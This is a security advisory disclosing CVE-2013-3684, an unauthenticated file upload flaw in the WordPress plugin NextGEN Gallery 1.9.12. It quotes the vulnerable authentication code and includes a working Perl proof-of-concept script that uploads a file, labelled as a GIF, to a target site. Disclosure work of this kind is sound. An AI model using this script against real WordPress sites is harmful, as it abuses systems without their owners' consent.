NextGEN Gallery 1.9.12 Shell Upload

`##############################################################  
  
  
- S21Sec Advisory -  
  
  
##############################################################  
  
Title: NextGEN Gallery 1.9.12 Arbitrary File Upload  
ID: S21SEC-046-en  
CVE ID: CVE-2013-3684  
Severity: High  
Status: Fixed  
History: 27.May.2013 Vulnerability discovered  
28.May.2013 Vendor informed  
12.Jun.2013 Fix released  
Authors: Marcos Agüero ([email protected])  
URL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt  
Release: Public  
  
  
[ SUMMARY ]  
  
NextGEN Gallery is a WordPress gallery plugin that offers sophisticated   
gallery management and  
displays. It's one of the most popular plugins ever produced for   
WordPress, currently downloaded  
around 30,000 times per week.  
  
[ AFFECTED VERSIONS ]  
  
* NextGEN Gallery 1.9.12  
  
[ DESCRIPTION ]  
  
NextGEN Gallery allows file upload to unauthenticated users. Filters in   
place only permits uploads  
of image files (extensions .gif, .png and .jpg). This avoids scripts   
execution problems but an  
attacker could use the affected system to host files.  
  
Vulnerability occurs due an innapropiate cookie validation in   
admin/upload.php script:  
  
if (wp_validate_auth_cookie()) {  
$results = wp_parse_auth_cookie();  
$logged_in = FALSE;  
if (isset($results['username']) && isset($results['expiration'])) {  
if (time() < floatval($results['expiration'])) {  
if (($userdata =   
get_userdatabylogin($results['username'])))  
$logged_in = $userdata->ID;  
}  
}  
  
if (!$logged_in) die("Login failure. -1");  
else if (!user_can($logged_in, 'NextGEN Upload images')) {  
die('You do not have permission to upload files. -2');  
}  
} # VULN: No auth cookie is okay!  
  
This can be triggered by invoking 'nggupload' parameter on any valid   
wordpress URL:  
  
ngggallery.php:  
  
// Handle upload requests  
add_action('init', array(&$this, 'handle_upload_request'));  
  
[...]  
function handle_upload_request()  
{  
if (isset($_GET['nggupload'])) {  
require_once(implode(DIRECTORY_SEPARATOR, array(  
NGGALLERY_ABSPATH,  
'admin',  
'upload.php'  
)));  
throw new E_Clean_Exit();  
}  
}  
  
[ POC ]  
#! /usr/bin/perl  
use LWP;  
use HTTP::Request::Common;  
  
my ($url, $file) = @ARGV;  
  
my $ua = LWP::UserAgent->new();  
my $req = POST $url,  
Content_Type => 'form-data',  
Content => [  
name => $name,  
galleryselect => 1, # Gallery ID, should exist  
Filedata => [ "$file", "file.gif", Content_Type =>   
'image/gif' ]  
];  
my $res = $ua->request( $req );  
if( $res->is_success ) {  
print $res->content;  
} else {  
print $res->status_line, "\n";  
}  
  
[ SOLUTION ]  
  
Version 1.9.13 released by vendor.   
http://wordpress.org/plugins/nextgen-gallery/  
  
[ REFERENCES ]  
  
* S21Sec  
http://www.s21sec.com  
  
--   
S21sec  
  
*Marcos Agüero*  
/S21sec ACSS/  
  
Tlf: +34 902 222 521  
  
www.s21sec.com <http://www.s21sec.com>, blog.s21sec.com   
<http://blog.s21sec.com> securityblog.s21sec.com   
<http://securityblog.s21sec.com>  
  
Salvo que se indique lo contrario, esta información es CONFIDENCIAL y   
contiene datos de carácter personal que han de ser tratados conforme a   
la legislación vigente en materia de protección de datos. Si usted no es   
destinatario original de este mensaje, le comunicamos que no está   
autorizado a revisar, reenviar, distribuir, copiar o imprimir la   
información en él contenida y le rogamos que proceda a borrarlo de sus   
sistemas.  
  
Unless contrary indicated, this information is CONFIDENTIAL and contains   
personal data that shall be processed according to personal data   
protection law in force. If you are not the named addressee of this   
message you are hereby notified that any review, dissemination,   
distribution, copying or printing of this message is strictly prohibited   
and we urge you to delete it from your Systems.  
  
Antes de imprimir este mensaje valora si verdaderamente es necesario. De   
esta forma contribuimos a la preservación del Medio Ambiente.  
  
`